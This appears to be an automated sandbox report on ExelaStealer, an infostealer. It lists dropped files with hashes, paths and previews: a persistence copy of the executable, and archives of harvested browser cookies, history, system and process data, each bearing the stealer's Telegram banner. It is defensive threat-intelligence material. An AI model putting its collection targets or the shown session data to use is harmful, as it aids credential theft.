Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Q...?...?...?.Z.<...?.Z.:...?.Z.;...?......?...:.9.?...;...?...<...?.Z.>...?...>...?.+.;...?.+.=...?.Rich..?.........................PE..d.....e.........."....%.....r.................@....................................Y^....`.....................................................x....`..,.... ..."...........p..\...0..................................@............... ............................text............................... ..`.rdata...+.......,..................@..@.data...83..........................@....pdata..."... ...$..................@..@_RDATA..\....P......................@..@.rsrc...,....`......................@..@.reloc..\....p......................@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	16417517
Entropy (8bit):	6.304218706058302
Encrypted:	false
SSDEEP:	196608:ZqqMPAEuton3dDTeeNy+wfm/pf+xfdkRuBnfXWK6tSDrIWOIWsDaqkH:lDtet5y+9/pWFGREnfXBPDrIW1TaDH
MD5:	4D70F444794DEDF45C2A6562D4EAED19
SHA1:	337A7A9BE709B1A3F848256C9E4A421911C265BE
SHA-256:	CA120C365DDD0E24311E36E1EC5D4AF6DB21B0F2EBD6F7DFD0D6A3A730621367
SHA-512:	846ED7F6FBDF15CCB13D3DEE5261357E8D3EFCF8FC0A804CCB0CFAFA166D89BA68D688AF51D36468C8ACD4B66DC209BA5475784ED88FE8EFF12C39D0E9FAAD01
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 53% Antivirus: Virustotal, Detection: 65%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Q...?...?...?.Z.<...?.Z.:...?.Z.;...?......?...:.9.?...;...?...<...?.Z.>...?...>...?.+.;...?.+.=...?.Rich..?.........................PE..d.....e.........."....%.....r.................@....................................Y^....`.....................................................x....`..,.... ..."...........p..\...0..................................@............... ............................text............................... ..`.rdata...+.......,..................@..@.data...83..........................@....pdata..."... ...$..................@..@_RDATA..\....P......................@..@.rsrc...,....`......................@..@.reloc..\....p......................@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulVmdtZ:NllUM
MD5:	013016A37665E1E37F0A3576A8EC8324
SHA1:	260F55EC88E3C4D384658F3C18C7FDEF202E47DD
SHA-256:	20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8
SHA-512:	99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D.zip

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	705969
Entropy (8bit):	7.997779651671917
Encrypted:	true
SSDEEP:	12288:rK7B846wZjnZ/l2cxKs7Ndh2dl0BX0ygd0qqQMcpvmAIuf6eSAQP:rKS46wj1Us7bh2dl0BX0f0oMcpoeSAQP
MD5:	EF61F4ED3D757817409014B14721F692
SHA1:	891D52E1C2E52C8887734EC2CCDC28FBF792F96D
SHA-256:	1B3E2B52CF46E4AD5CE3A9BA2E7AA60AA14100B1A1BB783A5001FA8775AAEB2A
SHA-512:	06BF7EFCD067B85A9C9804F17CEEB2A2BD8831EA15C8E2E0AF9D6BF087E3BF7B3C8A21318D282E5215C86C0C09EC372DBD420024B8D0BB5879F0BA48268AB76D
Malicious:	false
Preview:	PK........L6-X................Browsers/PK........L6-X................Wallets/PK........L6-X..V.....!.......Display (1).pngT.{<...?.?6.S9L..6LB.J....Q...!D.a.cN9.&..)J..3s.....\|6s>....}.~~..l.x..a...z..n....<.z......-.;..H.......j.h......M5 .K`...-U.(.e.wt.S-S7.`o<...8......1...8.}......._.<.].5..V.=.X.p...fw.....7.^g.[.;....h1c.. .29..jj......'.4F....2~.]..5......A...F...\..^_..(u9\...=.r.......s....\....=..9kU..i.N./...{.....w[....^v..I!.\|..@Zq..=\|..7...XL.Z..vm...O.?s...%G.....o...S2%.....P.!Oqu..Y....m.....N..x..]..z......}V.....{..'l9.m......2X.....=.a..?...u(.w{.(-).?..........ej...@....sL......=..R...c.+.._.ZWu..\|^....w...1#.......Vf8...N}......[..g.^..X.khe{......%.I6O...i.....#.=.....!J...J.......v.. ..}.@...OV~.{...r...cr.......8../~.Gi~.UY2l0Y..3.2.Y...Y........-.u.V...D......O0EY.......>.l/&..*....,O...~...q..&..UU..k..Uz0o.HK.\|.~X..W.D..m1.w...r.........w......../...E......l..[...a...9....-~e.S._...+.....6.n....C

C:\Users\user\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D\Browsers\Cookies.txt

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	432
Entropy (8bit):	5.365627083720754
Encrypted:	false
SSDEEP:	6:Lv5hOs3rsLgxbh+3r4wyXfaaW3UnhzrWgOsH6/8hwDFI0BFOqv5:L6s7JH+74xva3UhyL/8ObW0
MD5:	7C02C56F7D8D62510B3E7117500612A9
SHA1:	8F0FF1F5911101E6AB63418BB2FEBAACA431D2F2
SHA-256:	FF7A4ACC9936170BEC4315DC059166C35947BB1EBAFF79CB872BE680987802AA
SHA-512:	C21F998A73F557EBD6D4C4F160E5501B506B261E5D2CD058FAD0D9B453A469D640DFAF8970B3EB87A84FD3C4CBB0DE260309C1A769875E895DF88E8CCFE921A4
Malicious:	false
Preview:	----------------------https://t.me/ExelaStealer----------------------..======================================================================...google.com.TRUE./.FALSE.13343557341976489.1P_JAR.2023-10-05-07...google.com.TRUE./.FALSE.13356776540976533.NID.511=nNadqW9uTcY0OP6I3afnr71o6EzaYLsdpW4UEYN3vYq_rbRrNFxM1jozPGuhjORBZKKMz2tdDpVe7dNuTWp4CyK-zt5Is6wVElveWAfKQgwNJiKKtXHCCCmrlgzZTl5CiKjTeA2iQqf6zlRK2h8wg1hVpIsWsaKqaWJyHMPF3JA..

C:\Users\user\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D\Browsers\Firefox\History.txt

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1140
Entropy (8bit):	5.083438563310164
Encrypted:	false
SSDEEP:	24:LdrxsM0T/CrxsaQT/iWifT/QiRJT/TiCQERoT/WierDiJrd:Lz8mVcexFMwkcmh
MD5:	33A595FEA4D6D4BA39DADBE956AFB9E2
SHA1:	9F0674CC5EB35F922071AC7D076B041C4BBF1638
SHA-256:	32AAD8B4A981567081FE51B91DD9D75833D689CD9D3A1167A7E9CDC83CFB0744
SHA-512:	7D42A96347FC085CA69611F84477A7AB294CE683E9A958C256C7CBB820C835A17B13672F0C5C8BCAF746B48BDB9333C305AEEA46DE801DE8E427FFB0B1CBEFD4
Malicious:	false
Preview:	----------------------https://t.me/ExelaStealer----------------------..======================================================================..ID: 1 \| URL: https://support.mozilla.org/products/firefox \| Title: None \| Visit Count: 0 \| Last Visit Time: None..ID: 2 \| URL: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-browser&utm_medium=default-bookmarks&utm_campaign=customize \| Title: None \| Visit Count: 0 \| Last Visit Time: None..ID: 3 \| URL: https://www.mozilla.org/contribute/ \| Title: None \| Visit Count: 0 \| Last Visit Time: None..ID: 4 \| URL: https://www.mozilla.org/about/ \| Title: None \| Visit Count: 0 \| Last Visit Time: None..ID: 5 \| URL: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaign=new-users&utm_content=-global \| Title: None \| Visit Count: 0 \| Last Visit Time: None..ID: 6 \| URL: https://www.mozilla.org/privacy/firefox/ \| Title: None \| Visit Count: 1 \| Last Visit Time: 169649

C:\Users\user\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D\network_info.txt

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	257
Entropy (8bit):	4.3172860757600615
Encrypted:	false
SSDEEP:	3:111T8/s5hO7y9BXXLRJgnN3GU5cZyHEwAyWjWFUE31RcUoubRewLWn:Lv5hOcXXknN3GU5cok1S3bfoLpn
MD5:	430134D8BDC15F8A72194152614B2CD9
SHA1:	5931E27CA84C2E8207E7AF177C6767B3089C34D5
SHA-256:	639D5953E948277CDD97A6E1BF57DC7D3A220ED14952D04D79A708E73A7E2B8C
SHA-512:	908DE4180030BB3CA7CB134D4B4719BCDCE30D9814C832D16ED45DD55528BFC51E1D83060CD714251BECC91B24A695A4989C9635C13C46ECA98ABB2EBB04D2AF
Malicious:	false
Preview:	----------------------https://t.me/ExelaStealer----------------------..======================================================================..102.165.48.42..United States..Washington..America/New_York..AS174 DET Africa (Pty) LTD AS174 Cogent Communications

C:\Users\user\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D\process_info.txt

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	27938
Entropy (8bit):	4.744748239140429
Encrypted:	false
SSDEEP:	384:PA20pTSZSW8on7aVLlIr1QfEWKzRfP60Qp8V87b0mSaaeLdG3QXyDy6wGthv9qS0:x7M22gKR
MD5:	3185C4FEBA8839046826BD33C2461C45
SHA1:	BA9F10E0A8AABCB3A48BA6A769F0971096480AAE
SHA-256:	8182F43168D9F919B0174966E713DF8E3459ABD2832CDE8EF723D57F23916AAC
SHA-512:	08D5F8C7EF9814D310E56C678D2FA0143BB0A749383B9A18FDF2CCE044F34513B2CDB1B34D0A88070E01F455BCC5AF3286BC3621279460FAD6259ED0E740592F
Malicious:	false
Preview:	----------------------https://t.me/ExelaStealer----------------------..======================================================================.....Image Name: System Idle Process...PID: 0...Session Name: Services...Session#: 0...Mem Usage: 8 K......Image Name: System...PID: 4...Session Name: Services...Session#: 0...Mem Usage: 176 K......Image Name: Registry...PID: 92...Session Name: Services...Session#: 0...Mem Usage: 82'292 K......Image Name: smss.exe...PID: 328...Session Name: Services...Session#: 0...Mem Usage: 1'260 K......Image Name: csrss.exe...PID: 412...Session Name: Services...Session#: 0...Mem Usage: 5'376 K......Image Name: wininit.exe...PID: 488...Session Name: Services...Session#: 0...Mem Usage: 7'288 K......Image Name: csrss.exe...PID: 496...Session Name: Console...Session#: 1...Mem Usage: 6'072 K......Image Name: winlogon.exe...PID: 556

C:\Users\user\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D\system_info.txt

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	Algol 68 source, ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	144705
Entropy (8bit):	4.354328917810762
Encrypted:	false
SSDEEP:	1536:U8joX6mhzP3Z5OwXJF6Ebu02LZvzpSl79cTSIZ0tdHlwOYUBUgSgshWQCvYh/Uj3:U8aHn/
MD5:	3FC3EFC77842C993360AB3961273E42D
SHA1:	6F59AD82E7CF2EE21CA9F122C9CB416B177007A5
SHA-256:	79C0653B2D24820B069F9731F1114CB4EA9EA2FD0F87698F7BED02EA79B6D58B
SHA-512:	AF31E3805190CC989B10A08949C56D86F9979270049253A6FF44282E7AD78B60DE50B477D3633EAB918A47B3BCC276BE8371EA41C16E8C2F1C967170A41813A7
Malicious:	false
Preview:	----------------------https://t.me/ExelaStealer----------------------..======================================================================..####System Info#### ......Host Name: user-PC...OS Name: Microsoft Windows 10 Pro...OS Version: 10.0.19045 N/A Build 19045...OS Manufacturer: Microsoft Corporation...OS Configuration: Standalone Workstation...OS Build Type: Multiprocessor Free...Registered Owner: hardz...Registered Organization: ...Product ID: 00330-71431-70592-AAOEM...Original Install Date: 03/10/2023, 10:57:18...System Boot Time: 25/09/2023, 09:52:52...System Manufacturer: G6u4tRWyl1FGLK9...System Model: tmRUkZVC...System Type: x64-based PC...Processor(s): 2 Processor(s) Installed.... [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz... [02]:

C:\Users\user\AppData\Local\Temp\AutofillData.db

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Cookies.db

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DownloadData.db

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\HistoryData.db

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Logins.db

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\StealedFilesByExela.zip

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	modified
Size (bytes):	17974
Entropy (8bit):	7.838702753364649
Encrypted:	false
SSDEEP:	384:nMoBJxdRGRuReR1ZR1UR1FShuP/mFUvOHuzx6uzx09Pd:zJMEeR1ZR1UR1FShuPOF/uz8uzmT
MD5:	F514BF82125E326B5B1F0CB94CBA5FFE
SHA1:	08DCA8DADA695260FB237A17D34E7E1EDF20A029
SHA-256:	1177139070E24BF4D790014CB49F7D92AD933CFC948DFD054538A0A6FCEFFFEA
SHA-512:	55BF4AB055ACD45269E4E50E3F73D5DDA9A0F4FB0DE2D88044DF586B6887D7A221DEC7EF06632BD87521EF23160F1CDED7CFC71778B0B692127C739E523667AE
Malicious:	false
Preview:	PK.........NEW.f;r............BQJUWOYRTO.mp3..I.@!.D....D.#N(... m......z@...YQ....J.Y.#..n..S.....\...o.aDsw.d..../..Sms3...G.u..%k\......A..-f.............L.{.......(0......F.Lu......M....l.4Hi..Z........@5j%SR9.R.....Q.+C'C7.h......>.+0_........$.WC;O..gUK'..Y.....Bn.Z.qU....\.Z.6...xjX6...K..e...Z.%..^8.X.l.y.C$...u.Q...3.r.....L.......l....&...K..ja.9H.,....m..~....F.id..g...Ot..........k.....D...R..?......%0...a.,j/~/.U.....7s.v.v...B*.........Vm..J....d.Ai....R.... .C..(N..J...Gh%...).b...`5..d..>.K.KY..M.n.ER.z7.....!.py..-?[6.m.9.\.....Vi.a.[......R.......82P./..a\_x..~...z..Y.[K/.x\.%.~Q..q0s......UE_C..a.50..c^.K..){...B....w......PK.........NEWm?..............CZQKSDDMWR.docx..I.E!.E..E.7(v....RoH4...#.......+..$&.&..)...k....z..I.:{.....h...6..._.-.......{.U.DS'-u.k_.3..Vnsu.0.\zY.......L.N@B...K.r..N.u.....1..J.@L.)........Q....a.....\|8..7g.kQ....4.....k.>..n....k.<...EO..g.YBY.v..>u.{a..?f.... t..}U..l1...r...E.....W.

C:\Users\user\AppData\Local\Temp\StealedFilesByExela\BQJUWOYRTO.mp3

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.68639364218091
Encrypted:	false
SSDEEP:	24:P4r5D4QctcBd3LMDzR8JwOlGpXSmDbvy5z5hu/KBdAmHtTQ:P49StmdbMfR8ApSmnvyXhuCBd3ts
MD5:	1D78D2A3ECD9D04123657778C8317C4E
SHA1:	3FAA27B9C738170AEE603EFAE9E455CA459EC1B7
SHA-256:	88D5FF8529480476CA72191A785B1CCDB8A5535594C125AF253823DD2DC0820E
SHA-512:	7EA58B30CB5FDA1C4D71DC65DF64FD9703E81DDCBAD9DA5B405CBBEACB9197A6E8B933C844289D7852801B6A5BC545C4234DD69E85F0AF640F5BC51BE5DDA12E
Malicious:	false
Preview:	BQJUWOYRTOLXZEKCXDLSWRNMFMCSYXRPFWPCFOMLTXRLOYSWDYNKGJBBEKHPTUBSJDZWIUKDQVTQQAEIJPJKOPTWULSKKXLSOLVYRREVXVSZLFQQBXKKCMYLLBRWPJMBHNBFTQUBUPFYXLIARNGQLIDNRZYVXHIWZXDZUYNJJXBTDFJWBKWCQQGPRFDTAZULKSSEFZTUDJOKODZLAIWAICBXNPXUMZFRUVBQDJIENEPBRWTDBODAVKDNOLRNYNBKKQBPGBUTIJCMZXSCKDRZIHJDDUPOXQOJQXAOMBHVIUUZBSRKPYCRBAHBBGKXGMODRWMTAMVEFAPKYMHWCUCKKJSLQYPIMPYZKZKPIXSZAPTLQLZGQHTXZBXONOWDVDWQMPDILYOIVFKXBUSTSFUGKZZBFUUTDDOMVPOINIMBFTSGRRDLSLPUXATPQGHCHIJRAGXNYBQOTZSNMAZCEDHOUMBJWJSCXGDMRQCIYNBQTBGKDTCTKRJCRXWGYTZRFYVOFBTBDYLRCDVRFBCHFMPWSBHHWRRLBRKCLDQRSMCLVZAGFMWLPHYJGALXNLZXJVWWXBFHYIZDZFXDBTHZKRDQBGOXOULNHYYUXXATXCLPLWIUBSSSLNJBTSMXAWVUVUVKDAOHXCIVGHJLVIETMJMFWUZTFVNALCFBKNUVWGXUEPDHVHGOBZRVOPDFCORECRQJIXMUFIACDLBMTHCLLXOISHLMFTEBKUAICYBSNGCASKNQBLIPLSIPNJTWJLGARSXDGLOKVQSUASJSIRFNLKQTPVOVXSGKMXEEUVWMULGSMRQRMICWPXBVELHRSUIIUSGMSRWNPMSLNFKZWDRGGAVGKNPMSZMHRWAKTDXUHZPMIYCRABYQLAAVOSTLMEJGFHJSMBRQBEICTCXKKZHNUWSZMQZHAMPRHAWDVATODUFFRHCHJYGQZNMBWVRFZTJLSUUUMCUEOZEUMCJAOLHOIJTNPLJBASLIHCUCMVTUNIOK

C:\Users\user\AppData\Local\Temp\StealedFilesByExela\CZQKSDDMWR.docx

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700739677288544
Encrypted:	false
SSDEEP:	24:ppydEKvTSBiqFHi8v+wyNV+fxloGJjN3y5j1xTEC3ugbIvso8wFjas:rmEKvMiYC8Wwyr88GFAH/UvsuZl
MD5:	57582F5B6AE65D8DFCBD4A26382C6138
SHA1:	DC27AD5E54D1BDCCA4EC0D54ED1FB5A3235E9842
SHA-256:	7918D6E76741E42934BB32547E2D7EA395304AEA3383C0E6B7FCF82ACE125749
SHA-512:	6D75F68E608CB12378605F06C74F2F0414486072CC25961A1EA421B94EA5827F92110B902C2190E04AAE2D79152B0AB9B5B1ACECDCAAADD93A6F25028DD1E060
Malicious:	false
Preview:	CZQKSDDMWRVXFLQDZCLIIZCHKUTASMCLXARWUFPBFEESBCKPMBKHTZOAVUSGWGQBPZXNCLVHGKNWOAOTOSOFYOKUZEGHVYFBBGTMFWOOTOTSLTKZBTPTBZMUKYOSGWCRRYGDZWOEMUMCRRCZIEIYJAYGXMDKNOLEIKRXPEZKZGIXGYJYIBDXPZGYVGHMUCSHXXAYXQQNWIVOLMGKTXTGEAEKAOKQQSCTUWFEFQMLQUREMQDBYWFEQOMAJXVXIMMKWJJFKSSTMQZNWPBIQBZROXFYPWCYBVRMKUOGMEJJHYTWCOZYZXVANCHSTYZHRBVSORLGLSOWPDGEBVMQLDWKSLQFPEZDXWPZYNPSNTKGPNKUHFMAEGDWSDLCDNYFQZWURNIMQZDJNJPPOXINSGMUVHRDBWXOXDRPWKGITAKUVBIDIBIWIIANONNQUMKNATQWTVSOUCLOFKCCAISNABSKDPLNCYIQIFQMVEHZLIAFYDDSJJTQSUEVQKACGQHHXCYTZJABESDNXLIPGYKWXJZQWYJMSZUZHKYCGKQIKCYIWZOHAVHKCRNACDVNLPEXUPOQVKBGVFKCQDKJPNALRMAYMZRBAGMTICYZEFMXXYLDXTMKSZLDKSKSRQTDUDGFZXFQEHEDXVFBYBNEOVKFLNIRSTGZDIJXNRZEZFJHNPZDGPGECJTHNVMTSURANVWOVRBTYGZGIPOXWTRIHNKWFKCTXVVKOFHISZVHNVVRXJGJEZEJDSCKNIDUQYQWFNDXBQQJAYENVZXKXVUERYEPFEGNWBAJHHQSAFTHXGXMHUHJVQEYGVKPBTQMWUEZMBBSFENGBBVZIYHLXFRDPALQUURINJMTQGTPGJRGIWXIXWOPVDTWDBDNJJVXOPMTWAGMWQFUPMRROBBTRTOQBMZKPGWTYPWAVOKTSPLMOWJJDVZIIDATCEGNLHPVRONAQJFLFUZXJVRXMCGQNRKTYBRGRMKBPVPQSPFOIOHXGEGDHOJP

C:\Users\user\AppData\Local\Temp\StealedFilesByExela\DQOFHVHTMG.png

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702862417860716
Encrypted:	false
SSDEEP:	24:JCmIDeBF63lGj/+QvH8n8JCl7odrVgKqBP68iz:4QQQvHFrTqBPXiz
MD5:	CC0686FCDF6617729D1EDF30F49501F1
SHA1:	02D629848E3D467D8143B057F003E0D7448126CD
SHA-256:	31E15305BC0579F03C51A1D6534B332F32C73ABC6D1B68BA0BDA6FCF97F593C9
SHA-512:	8BD18EB486BA6D2799329D9A8EFB3F52C3D109F5CB070290418DDE4B58756CD023857E4CAE62323C530FA0D3A60372C97D9744C1911A688D3592EABD14005F25
Malicious:	false
Preview:	DQOFHVHTMGONGZJMTUDJRBBZMRPVREMYHKGEHFUQYXZCSKHYXSDQYNTHYMAXXVSVAUOGMFIYPDCQLTHSECIYLWTRIBFEAYHUXINIFQBTJDZMINEEJPQYKGEESHWZILKBYECTPQSECVJBFSZOCCSNOVPIAHSFZWVXPNEQGUOXWPBXJRUYFARJLNHPVXAJZAMAADRKIWNDXYEBYMEBSXOJGEOURNOIBBLONDSVHAOQHPMGXZYJJTGITBJPQEBNXGZYUKARGBCVCJUHSRNNEVOIGUVCJVMNFBKNVZYQADNKMLUVPOTXVOQFRBXUSSRFMQEZCJFQXKCGKGKCVGGVBKNPTNSSMADFJLSDMVXHSOETKCENTGLOVOHUYJFTIWFHKFJRYNOXVIGPLHNBFPFOCWMNOQXWIPYAHPKRVTBFYKRBDVDUAZBSLWPPMXJXDVRCRPKOGCUKNZKBLJGIGZASUAZBLZBMGJSBNQSVTMGEWGLMNJKCSBEAGDUINAXDWMHJASNQRRDMKVXOKATATHRLEOJRPCUOAVQIESHZYWIQCSCAPIAJHBTEIYVRFEDCQDCDIYPMQVBWUEHDPIDAGKYZBMLBDUTEIFYLBSHAWEMNTPQDCSTOWSBZWQEBLVBNUWKZFUDMPBKETDOEOIXRFTDUFIBPBSUHXQTCPRPZAKDTRWMGSAVOZBNDDMDIHBSGIPOMYLKSGKUWRGKNXSOLUZDUZYQFQTKMNWLSYKVAQVIHJTFYNRTERQMIRVMLNWEIMHPIWEWIZJJRGOCBVHFGCSCPAIQYTEMYIQJKVUFAZERTMPUQSRHOZHOYABIALCSKDKHEDHJGKBYVCDZGPYPCLDCEFHWFMLSBOUUGKJFXSVKJVYVTSMIZISSWNRRWBNOMXZCOJAULXRXTNHTYWTZNFOKXVGZMTRVOSMSRMYBHKSHRCPZSSMDBJOTQQRGYIHEMZHHSWECVAOPVNLGBYHZVZPLQHOTCJNPUXICWZBLKAQFGUZPW

C:\Users\user\AppData\Local\Temp\StealedFilesByExela\FAAGWHBVUU.mp3

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696563923881884
Encrypted:	false
SSDEEP:	24:5/VaDtnzLQ+f43tOT8I+KwurMekIRdXEt5L3tYor2Xp2CpvirtyrRofz/:hVaDQ3t9I+AFlXE7L3yLprvMEaD
MD5:	CD90073A050D84BFC07DF7516A76BE8F
SHA1:	5BA173F226A697FF62B1208D33B3BACA3B2EFC1D
SHA-256:	8E77CEDA3994BC3AD371B51807B7B77A08F2F5A3A232C0991C4763C9B2E78E13
SHA-512:	A07B25F8DB5B2E680122920BBDCFB6138ACD8856F203A447ED6E63E2411388567CC7ADB1C2DC2F9B87C7DCFD9671D1EAC8CB9FF9BB10677806755D739478C328
Malicious:	false
